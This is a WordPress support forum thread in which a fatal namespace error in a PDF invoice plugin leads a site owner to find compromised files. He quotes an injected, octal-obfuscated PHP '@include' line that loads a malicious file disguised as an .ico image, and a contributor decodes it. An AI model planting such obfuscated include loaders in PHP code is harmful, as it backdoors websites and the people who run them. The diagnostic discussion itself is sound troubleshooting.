Namespace declaration statement has to be the very first statement

  • Resolved Paul Scollon

    (@scollonp)


    5 years, 6 months ago

    I’m getting this with the latest version (debugger switched on) when trying to print a PDF invoice.

    Fatal error: Namespace declaration statement has to be the very first statement or after any declare call in the script in /var/www/html/wp-content/plugins/woocommerce-pdf-invoices-packing-slips/includes/class-wcpdf-pdf-maker.php on line 2

    If I choose to output to HTML instead, all goes fine, but PDF would be preferred and worked until recently. All plugins and the core is up to date.

    The page I need help with: [log in to see the link]

Viewing 5 replies - 1 through 5 (of 5 total)
  • Plugin Contributor Ewout

    (@pomegranate)

    Hello Paul,
    The Namespace declaration is actually the very first statement:
    includes/class-wcpdf-pdf-maker.php

    This is not different in any other classes. (e.g. includes/class-wcpdf-main.php)
    I believe this issue is caused somewhere else, by a function or an error causing premature output. Do you also get this error with debugger switched off?

    Thread Starter Paul Scollon

    (@scollonp)

    First off, VERY prompt reply. I’m impressed! Secondly, with the debugger off the output is just “The site is experiencing technical difficulties” and nothing is written to to the nginx error log.

    Plugin Contributor Ewout

    (@pomegranate)

    These issues can be super tricky to track down… I’ve seen a similar a few years ago with another customer and it turned out to be there was a “Byte Order Mark” at the start of his wp-config.php file. This resulted in all his downloads to include this character too, for example, even just the CSS files served to his site but it doesn’t have any visible impact there, so not specifically related to PDF Invoices.

    To track this down requires some technical knowledge, but your host may be able to help with this too. All you would need to know if there are any PHP files in your site starting with the byte-order-mark (0xEF,0xBB,0xBF).

    Is that something you or your host can do?

    p.s. it’s also possible that this happened somewhere in a php file that was modified, reinstalling the PDF invoice plugin via the WordPress Plugins > Add New menu may also solve that in this case…

    Thread Starter Paul Scollon

    (@scollonp)

    Your comments led me to find multiple compromises files, with additions similar too this:

    /*1fa7b*/

@include "\057va\162/w\167w/\150tm\154/w\160-i\156cl\165de\163/i\155ag\145s/\05632\070a8\06006\056ic\157";

/*1fa7b*/

    I have access to the server, so am cleaning up right now. Thanks for your very speedy assistance!

    Plugin Contributor Ewout

    (@pomegranate)

    Thanks for sharing that Paul, that’s certainy suspicious. The @include statement is a UTF8 encoded string that decodes to /var/www/html/wp-includes/images/.328a8006.ico, which is probably a malicious PHP file disguised as an image. I’m sorry that your site has been compromised, I hope you can clean this up quickly and not too much damage has been done. Good luck!

Viewing 5 replies - 1 through 5 (of 5 total)
  • The topic ‘Namespace declaration statement has to be the very first statement’ is closed to new replies.